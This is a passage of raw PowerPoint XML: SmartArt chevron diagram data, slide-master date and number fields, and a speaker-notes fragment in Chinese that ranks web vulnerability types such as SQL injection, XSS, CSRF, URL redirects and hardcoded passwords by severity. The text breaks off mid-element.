    <dgm:pt modelId="{363F121B-2519-47D4-8A77-7901476FA11D}" type="pres">
      <dgm:prSet presAssocID="{92C9C545-54F0-4E04-AB0E-8E716C33DA50}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAEB0EDC-D184-40B5-BB49-EEC51081F9FE}" type="pres">
      <dgm:prSet presAssocID="{92C9C545-54F0-4E04-AB0E-8E716C33DA50}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{759223BB-D0B8-47D9-90EC-7DC5F1F52AB0}" type="pres">
      <dgm:prSet presAssocID="{B3139C94-A61F-437B-9071-16197C586360}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E198EAAE-DF44-4AC9-8166-6E844C6FB8F8}" type="pres">
      <dgm:prSet presAssocID="{2F797C68-D2EC-497B-A04A-D6CD6DEB8163}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2BBC1519-B9D1-4D73-B28A-AD5B58B218BE}" type="pres">
      <dgm:prSet presAssocID="{2F797C68-D2EC-497B-A04A-D6CD6DEB8163}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E565EC47-CF5B-4387-B285-4F2397FDF6C5}" type="pres">
      <dgm:prSet presAssocID="{2F797C68-D2EC-497B-A04A-D6CD6DEB8163}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA2820FD-9D9B-45E3-9BE1-61EA104697F6}" type="pres">
      <dgm:prSet presAssocID="{7C558FDA-5D7E-4324-9999-8B7104DB5422}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9288001E-C1C7-48DB-B3EE-8A128D4DC5EE}" type="pres">
      <dgm:prSet presAssocID="{5FB50D4B-7FB7-49F3-A4CF-547884E61EE5}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F96C8FA3-BA85-4BBA-86BB-A81EE30FAEE7}" type="pres">
      <dgm:prSet presAssocID="{5FB50D4B-7FB7-49F3-A4CF-547884E61EE5}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E23BDB4A-2BD1-4B4E-8819-5D96FC4253FA}" type="pres">
      <dgm:prSet presAssocID="{5FB50D4B-7FB7-49F3-A4CF-547884E61EE5}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EC36902-CF9A-4AE2-B10D-282D261F5EB4}" type="pres">
      <dgm:prSet presAssocID="{0295E1A8-CA8B-477A-A2C6-4699A4B434A2}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F39D195B-878C-45C9-8FFB-B11B6CAAE276}" type="pres">
      <dgm:prSet presAssocID="{E6E3925C-7FA6-4D52-8998-932C4BB33225}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7FE94D35-991F-4D3B-8541-EC84DAC68FDD}" type="pres">
      <dgm:prSet presAssocID="{E6E3925C-7FA6-4D52-8998-932C4BB33225}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6DDCA428-E1D3-4B6A-8CFB-8F6C944E1B43}" type="pres">
      <dgm:prSet presAssocID="{E6E3925C-7FA6-4D52-8998-932C4BB33225}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{5AA5636F-7970-41D6-9AF4-773601A9F97D}" srcId="{92C9C545-54F0-4E04-AB0E-8E716C33DA50}" destId="{B3DCAFF0-1498-452A-A34C-3A65CC6764FA}" srcOrd="1" destOrd="0" parTransId="{F50AF5DD-9031-4EC9-8C2E-C0A2D491EDC8}" sibTransId="{DD18DDD8-1C0E-4669-92F0-95147FBE96E7}"/>
    <dgm:cxn modelId="{6CF41082-FF89-4060-9BC5-78B585400DF3}" type="presOf" srcId="{224E5D6F-C121-4245-B2A2-229D44F8A717}" destId="{E23BDB4A-2BD1-4B4E-8819-5D96FC4253FA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{F645B2AC-0610-456C-86B6-F3FF5FC699F2}" type="presOf" srcId="{C82432DB-EAEB-4873-BB4C-BB4D6C1D5FC0}" destId="{E23BDB4A-2BD1-4B4E-8819-5D96FC4253FA}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{3DF480AD-D8EA-4D42-A7F0-197DAD99F170}" type="presOf" srcId="{4DA4B4C2-8957-46EB-9CA9-047B39869BBB}" destId="{CB776BE5-5451-43C2-8580-BADBB272BA26}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{B2CC99F8-E677-4C7F-BCB5-C48F4D80C35A}" type="presOf" srcId="{35FD5845-E2AB-4A28-A1A6-BFD0B5B909B5}" destId="{6DDCA428-E1D3-4B6A-8CFB-8F6C944E1B43}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{8EB553E8-05C6-4EE7-98FC-516A8DE23B46}" srcId="{EE54A1DE-7F67-4380-B9FA-0BBD582DC209}" destId="{CCA4C5C6-6D57-468E-98EA-66821820434A}" srcOrd="1" destOrd="0" parTransId="{28A57947-B12C-432C-9B3E-45B45C6ABC21}" sibTransId="{C37E6B18-1679-4AB4-9881-3A3AEEEAA5D3}"/>
    <dgm:cxn modelId="{CD5D6109-441A-461F-AF7A-D8E3FBDD37C6}" srcId="{DAE5EC8A-56D6-4485-BEC9-22F6E7405978}" destId="{92C9C545-54F0-4E04-AB0E-8E716C33DA50}" srcOrd="1" destOrd="0" parTransId="{AC72EDCA-4AFB-450B-934A-839713B115E2}" sibTransId="{B3139C94-A61F-437B-9071-16197C586360}"/>
    <dgm:cxn modelId="{EF17AA95-0DD9-4A25-AD72-02F93C748D8D}" srcId="{92C9C545-54F0-4E04-AB0E-8E716C33DA50}" destId="{9348B237-B599-4210-89B0-D8587F9F1F76}" srcOrd="0" destOrd="0" parTransId="{D5D52DF4-FAB2-478A-B42D-4D82712EB570}" sibTransId="{A44AF9E9-31BE-4AB7-BD8B-96D5944B2F9D}"/>
    <dgm:cxn modelId="{F051EBF9-1BD7-40BE-915C-228ECAD98272}" srcId="{DAE5EC8A-56D6-4485-BEC9-22F6E7405978}" destId="{2F797C68-D2EC-497B-A04A-D6CD6DEB8163}" srcOrd="2" destOrd="0" parTransId="{59F0AF51-F673-4089-A89A-C72A83137052}" sibTransId="{7C558FDA-5D7E-4324-9999-8B7104DB5422}"/>
    <dgm:cxn modelId="{62967BAD-B461-4ECB-A542-EF9F304EA180}" type="presOf" srcId="{559CC706-9CF8-49E3-90FB-20FD5384C212}" destId="{6DDCA428-E1D3-4B6A-8CFB-8F6C944E1B43}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{0B97E74C-2FBC-416D-BAD8-06EB34A14187}" type="presOf" srcId="{B3DCAFF0-1498-452A-A34C-3A65CC6764FA}" destId="{EAEB0EDC-D184-40B5-BB49-EEC51081F9FE}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{C19B03EC-066B-4E54-9ED0-3AD8BAEB8D82}" type="presOf" srcId="{CCA4C5C6-6D57-468E-98EA-66821820434A}" destId="{CB776BE5-5451-43C2-8580-BADBB272BA26}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{9437EB3B-AC6A-47EF-BA83-5E65CE6A9862}" type="presOf" srcId="{9348B237-B599-4210-89B0-D8587F9F1F76}" destId="{EAEB0EDC-D184-40B5-BB49-EEC51081F9FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{A2524734-D392-42EA-B95F-32CD1719F743}" type="presOf" srcId="{2F797C68-D2EC-497B-A04A-D6CD6DEB8163}" destId="{2BBC1519-B9D1-4D73-B28A-AD5B58B218BE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{2FD17AF4-98E6-48B7-B601-94EFBF6B2AC7}" srcId="{2F797C68-D2EC-497B-A04A-D6CD6DEB8163}" destId="{8C2EF347-2F0F-40E2-911C-21976D00B369}" srcOrd="0" destOrd="0" parTransId="{166C6E48-FE80-4F26-9B08-8D52C35F166B}" sibTransId="{74639954-E933-4B24-9290-02429E3924A8}"/>
    <dgm:cxn modelId="{50E889F3-702E-4B82-8A0A-133A4A983625}" type="presOf" srcId="{92C9C545-54F0-4E04-AB0E-8E716C33DA50}" destId="{363F121B-2519-47D4-8A77-7901476FA11D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{6E7A0F20-C36F-40CA-B082-920CCEF61995}" type="presOf" srcId="{EE54A1DE-7F67-4380-B9FA-0BBD582DC209}" destId="{80D711F6-29FE-416C-BF75-961EEFBD7986}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{280688A1-6D25-4ADD-9F10-FCB06B7E25B7}" type="presOf" srcId="{8C2EF347-2F0F-40E2-911C-21976D00B369}" destId="{E565EC47-CF5B-4387-B285-4F2397FDF6C5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{EC7AA0C2-60DE-4BB0-84C3-ACCC57730657}" srcId="{E6E3925C-7FA6-4D52-8998-932C4BB33225}" destId="{35FD5845-E2AB-4A28-A1A6-BFD0B5B909B5}" srcOrd="0" destOrd="0" parTransId="{E5386CA7-580A-43B4-AD53-06B1FD354528}" sibTransId="{9173E3EE-79B2-434B-A620-B82148A392A8}"/>
    <dgm:cxn modelId="{17B4CFC8-BEC8-4B55-8FCA-A47C8575F361}" srcId="{5FB50D4B-7FB7-49F3-A4CF-547884E61EE5}" destId="{224E5D6F-C121-4245-B2A2-229D44F8A717}" srcOrd="0" destOrd="0" parTransId="{FBF6D387-1595-4652-9458-4C00812F98BA}" sibTransId="{9DACACBE-124B-4215-9E59-D90DC7EB243E}"/>
    <dgm:cxn modelId="{44C29F29-A82C-49C9-8C63-2CC55EF24467}" srcId="{E6E3925C-7FA6-4D52-8998-932C4BB33225}" destId="{559CC706-9CF8-49E3-90FB-20FD5384C212}" srcOrd="1" destOrd="0" parTransId="{229C5E48-B1E0-4768-BF87-AF0050F7560B}" sibTransId="{C58EBD41-2F4D-481A-B97D-2EF18AA592A7}"/>
    <dgm:cxn modelId="{BAB1A984-4FA2-4198-9C98-9F918192407F}" srcId="{EE54A1DE-7F67-4380-B9FA-0BBD582DC209}" destId="{4DA4B4C2-8957-46EB-9CA9-047B39869BBB}" srcOrd="0" destOrd="0" parTransId="{62794C94-20BF-48CC-99F4-BF2DA7F258F9}" sibTransId="{8D447A6B-B3AD-4C01-AA0B-22E0F55563D2}"/>
    <dgm:cxn modelId="{A1465E10-46E8-446C-9367-D85043EA45FF}" srcId="{DAE5EC8A-56D6-4485-BEC9-22F6E7405978}" destId="{5FB50D4B-7FB7-49F3-A4CF-547884E61EE5}" srcOrd="3" destOrd="0" parTransId="{428C35CF-4CC8-46A4-AF72-86C1F3205A6A}" sibTransId="{0295E1A8-CA8B-477A-A2C6-4699A4B434A2}"/>
    <dgm:cxn modelId="{388A3E6C-3486-49F3-9E54-AF8663A8252F}" srcId="{5FB50D4B-7FB7-49F3-A4CF-547884E61EE5}" destId="{C82432DB-EAEB-4873-BB4C-BB4D6C1D5FC0}" srcOrd="1" destOrd="0" parTransId="{16C1DCE8-0E42-4693-99D2-FBCCEBD970E2}" sibTransId="{22CFEFEB-541D-4F39-B4FB-E5B0CDB9D9E6}"/>
    <dgm:cxn modelId="{3322B351-BF95-458D-BBFD-1A5FF9E1F40E}" type="presOf" srcId="{5FB50D4B-7FB7-49F3-A4CF-547884E61EE5}" destId="{F96C8FA3-BA85-4BBA-86BB-A81EE30FAEE7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{5E22266C-80F3-4928-9563-F44538101916}" srcId="{DAE5EC8A-56D6-4485-BEC9-22F6E7405978}" destId="{E6E3925C-7FA6-4D52-8998-932C4BB33225}" srcOrd="4" destOrd="0" parTransId="{BCEB2159-41D3-4D73-A1DD-B8F70D3C825E}" sibTransId="{57B6ECA9-CFCB-4A47-940A-5F3F0509D88C}"/>
    <dgm:cxn modelId="{87FFB478-5358-4BAE-BD89-E0E2A3D4628D}" type="presOf" srcId="{E6E3925C-7FA6-4D52-8998-932C4BB33225}" destId="{7FE94D35-991F-4D3B-8541-EC84DAC68FDD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{BC36DC32-C46A-4B29-A709-CD16615E9678}" type="presOf" srcId="{DAE5EC8A-56D6-4485-BEC9-22F6E7405978}" destId="{EC6BC52E-15C4-436D-B8A1-3583B2C4A0F8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{B1EAF549-EF7C-4B00-B0B4-F01FDA12B3E8}" srcId="{DAE5EC8A-56D6-4485-BEC9-22F6E7405978}" destId="{EE54A1DE-7F67-4380-B9FA-0BBD582DC209}" srcOrd="0" destOrd="0" parTransId="{2691E70D-248B-43EB-A1B3-A63F074D6C09}" sibTransId="{253611D1-7910-4385-BDD3-2FF207B606FD}"/>
    <dgm:cxn modelId="{D8446E4B-120A-4EA2-AA42-56598A425110}" type="presParOf" srcId="{EC6BC52E-15C4-436D-B8A1-3583B2C4A0F8}" destId="{77CFC7BC-C923-4A17-8B09-7A63D5E81E86}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{A9712053-B3CB-4E37-AA83-0F2DE703C73C}" type="presParOf" srcId="{77CFC7BC-C923-4A17-8B09-7A63D5E81E86}" destId="{80D711F6-29FE-416C-BF75-961EEFBD7986}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{E2281A8E-9606-4FA2-B381-14A01C5A37C4}" type="presParOf" srcId="{77CFC7BC-C923-4A17-8B09-7A63D5E81E86}" destId="{CB776BE5-5451-43C2-8580-BADBB272BA26}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{3978C83C-A87F-4CEB-AD0D-F316ECB447DD}" type="presParOf" srcId="{EC6BC52E-15C4-436D-B8A1-3583B2C4A0F8}" destId="{610A138A-8A98-4551-8AB1-8B2AAB1352D9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{DF806D48-4A84-425D-A518-D78211107965}" type="presParOf" srcId="{EC6BC52E-15C4-436D-B8A1-3583B2C4A0F8}" destId="{8B040756-3D57-4056-8F47-4F04D38ABA9F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{4FD66E28-4274-4D68-9A60-279DDC83376C}" type="presParOf" srcId="{8B040756-3D57-4056-8F47-4F04D38ABA9F}" destId="{363F121B-2519-47D4-8A77-7901476FA11D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{99501490-1CFD-42FD-9ECD-7865B25CC74E}" type="presParOf" srcId="{8B040756-3D57-4056-8F47-4F04D38ABA9F}" destId="{EAEB0EDC-D184-40B5-BB49-EEC51081F9FE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{42B0E3C3-8E06-43C0-BBB3-AE97C4345800}" type="presParOf" srcId="{EC6BC52E-15C4-436D-B8A1-3583B2C4A0F8}" destId="{759223BB-D0B8-47D9-90EC-7DC5F1F52AB0}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{D7FF0C42-D00D-410F-AE17-4B3128A2F1DC}" type="presParOf" srcId="{EC6BC52E-15C4-436D-B8A1-3583B2C4A0F8}" destId="{E198EAAE-DF44-4AC9-8166-6E844C6FB8F8}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{19E9AF3B-1AB8-4069-A22A-040D2720E643}" type="presParOf" srcId="{E198EAAE-DF44-4AC9-8166-6E844C6FB8F8}" destId="{2BBC1519-B9D1-4D73-B28A-AD5B58B218BE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{4C49E25F-1C77-4611-9BB3-D3683DDBC185}" type="presParOf" srcId="{E198EAAE-DF44-4AC9-8166-6E844C6FB8F8}" destId="{E565EC47-CF5B-4387-B285-4F2397FDF6C5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{BC92130E-7A77-4C40-919D-9564A0206177}" type="presParOf" srcId="{EC6BC52E-15C4-436D-B8A1-3583B2C4A0F8}" destId="{EA2820FD-9D9B-45E3-9BE1-61EA104697F6}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{2EA1F8AF-342D-4BE9-9118-9C6748127059}" type="presParOf" srcId="{EC6BC52E-15C4-436D-B8A1-3583B2C4A0F8}" destId="{9288001E-C1C7-48DB-B3EE-8A128D4DC5EE}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{1845D025-0A81-463D-8D4D-B6C0B866E85B}" type="presParOf" srcId="{9288001E-C1C7-48DB-B3EE-8A128D4DC5EE}" destId="{F96C8FA3-BA85-4BBA-86BB-A81EE30FAEE7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{38D866F1-E2E5-434F-A2AA-A13CB2E32FFE}" type="presParOf" srcId="{9288001E-C1C7-48DB-B3EE-8A128D4DC5EE}" destId="{E23BDB4A-2BD1-4B4E-8819-5D96FC4253FA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{1F7BCD18-5755-4819-AA22-3D4E3F502142}" type="presParOf" srcId="{EC6BC52E-15C4-436D-B8A1-3583B2C4A0F8}" destId="{3EC36902-CF9A-4AE2-B10D-282D261F5EB4}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{AE7A97F1-F8C5-4C11-A15F-C02F358911C0}" type="presParOf" srcId="{EC6BC52E-15C4-436D-B8A1-3583B2C4A0F8}" destId="{F39D195B-878C-45C9-8FFB-B11B6CAAE276}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{20C930F9-8771-4B7E-8B99-BBAAA1FC7891}" type="presParOf" srcId="{F39D195B-878C-45C9-8FFB-B11B6CAAE276}" destId="{7FE94D35-991F-4D3B-8541-EC84DAC68FDD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{04BE6771-01C7-41C5-9644-82910FFFB718}" type="presParOf" srcId="{F39D195B-878C-45C9-8FFB-B11B6CAAE276}" destId="{6DDCA428-E1D3-4B6A-8CFB-8F6C944E1B4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6C43BA6E-0C45-344D-BEB8-9AED464FC4A7}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2019/11/26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0CE30E63-6317-004F-8E4E-C7490F81BB11}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1611771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4D93D25B-FF58-4C41-AFEA-6A9CAFB9F0CD}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2019/11/26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A01C7B5F-6A46-7341-9207-C3D7F3B3484A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20617466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p:spPr>
        <p:txBody>
          <a:bodyP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00634BC2-2793-BD47-869F-BCC0A1CEAE7A}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33794" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>高危  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中危  反编译，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>重定向，硬编码密码           多发  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
